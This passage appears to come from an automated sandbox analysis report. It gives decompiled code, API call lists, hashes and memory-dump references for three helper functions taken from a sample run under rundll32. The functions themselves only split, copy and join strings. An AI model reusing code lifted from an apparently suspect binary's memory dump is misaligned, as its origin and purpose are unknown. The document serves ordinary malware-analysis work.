                                          • Instruction ID: 725022bb05a89921cf0a546bd881243066c5f1205d55901cc37db6af1de2dd54
                                          • Opcode Fuzzy Hash: 0ee9807e2c3e40d66f898ebf360ac718f708cdf3107855dc1a725aa24afc818a
                                          • Instruction Fuzzy Hash: 1AF0D4B4A022449BEB18AFB4F959E253BEBEF19701B094118E902DB250C678ED41CA10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD6B6E, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04FD6B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04FD58BE(_t2);
				if(_t34 != 0) {
					_t30 = E04FD58BE(_t28);
					if(_t30 == 0) {
						E04FD147E(_t34);
					} else {
						_t39 = _a4;
						_t22 = E04FDA8D2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E04FDA8D2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                          0x04fd6b6e
                                          0x04fd6b78
                                          0x04fd6b7a
                                          0x04fd6b80
                                          0x04fd6b80
                                          0x04fd6b89
                                          0x04fd6b8d
                                          0x04fd6b99
                                          0x04fd6b9d
                                          0x04fd6c11
                                          0x04fd6b9f
                                          0x04fd6b9f
                                          0x04fd6ba3
                                          0x04fd6ba8
                                          0x04fd6bad
                                          0x04fd6bc7
                                          0x04fd6bb6
                                          0x04fd6bb6
                                          0x04fd6bba
                                          0x04fd6bbd
                                          0x04fd6bc2
                                          0x04fd6bc2
                                          0x04fd6bcc
                                          0x04fd6bf4
                                          0x04fd6bfa
                                          0x04fd6bfd
                                          0x04fd6bce
                                          0x04fd6bd0
                                          0x04fd6bd8
                                          0x04fd6be3
                                          0x04fd6be8
                                          0x04fd6be8
                                          0x04fd6c04
                                          0x04fd6c0b
                                          0x04fd6c0c
                                          0x04fd6c0c
                                          0x04fd6b9d
                                          0x04fd6c1c

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04FDA006,?,?,?,?,00000102,04FD66AF,?,?,00000000), ref: 04FD6B7A
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                            • Part of subcall function 04FDA8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04FD6BA8,00000000,00000001,00000001,?,?,04FDA006,?,?,?,?,00000102), ref: 04FDA8E0
                                            • Part of subcall function 04FDA8D2: StrChrA.SHLWAPI(?,0000003F,?,?,04FDA006,?,?,?,?,00000102,04FD66AF,?,?,00000000,00000000), ref: 04FDA8EA
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04FDA006,?,?,?,?,00000102,04FD66AF,?), ref: 04FD6BD8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04FD6BE8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04FD6BF4
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: 49a342e8c2bb681233c224b899d7c19b67766c263644e7ee794cc3b9d1d50f0b
                                          • Instruction ID: f80087a6def261750c8c9f5c8a376487caf9a3a24e12036b0f3a477dc5e38cee
                                          • Opcode Fuzzy Hash: 49a342e8c2bb681233c224b899d7c19b67766c263644e7ee794cc3b9d1d50f0b
                                          • Instruction Fuzzy Hash: 8F21B472904259BFEB125FB5CD44AAF7FAADF06384B098064F904DB201E735EA02D7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD5FCB, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04FD5FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04FD58BE(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                          0x04fd5fe0
                                          0x04fd5fe4
                                          0x04fd5fee
                                          0x04fd5ff3
                                          0x04fd5ff8
                                          0x04fd5ffa
                                          0x04fd6002
                                          0x04fd6007
                                          0x04fd6015
                                          0x04fd601a
                                          0x04fd6024

                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,0752937C,?,04FD694E,004F0053,0752937C,?,?,?,?,?,?,04FD9C10), ref: 04FD5FDB
                                          • lstrlenW.KERNEL32(04FD694E,?,04FD694E,004F0053,0752937C,?,?,?,?,?,?,04FD9C10), ref: 04FD5FE2
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,04FD694E,004F0053,0752937C,?,?,?,?,?,?,04FD9C10), ref: 04FD6002
                                          • memcpy.NTDLL(751469A0,04FD694E,00000002,00000000,004F0053,751469A0,?,?,04FD694E,004F0053,0752937C), ref: 04FD6015
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: 56b9731860fca8eecb716d0486117ab516eb15dfb93b706682c20e07cb2308e1
                                          • Instruction ID: d6035b0b8e5af24a0117db70b918bb844f223a6a4149112827aa4fb4d4bb2ab2
                                          • Opcode Fuzzy Hash: 56b9731860fca8eecb716d0486117ab516eb15dfb93b706682c20e07cb2308e1
                                          • Instruction Fuzzy Hash: F6F04972900118BB9F11EFA9CC89C9F7BADEF082987094062EA04D7205E735EE15DBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD9DEF, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,04FD5335,616D692F,00000000), ref: 04FD9DFB
                                          • lstrlen.KERNEL32(?), ref: 04FD9E03
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04FD9E1A
                                          • lstrcat.KERNEL32(00000000,?), ref: 04FD9E25
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: 1ca4b2dd7ba58cb89cfe25188dae90762bc0c4370cf6de842d33e9e069a8d022
                                          • Instruction ID: 47a8ffbdf276938e5711eaa1e403a6989419a4b6b3ea4d0f490126340ee88f7d
                                          • Opcode Fuzzy Hash: 1ca4b2dd7ba58cb89cfe25188dae90762bc0c4370cf6de842d33e9e069a8d022
                                          • Instruction Fuzzy Hash: 5BE01A33806665AB87226BB4AC0CC8FBBAAFF89260B094916F650D3114CB35D815CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%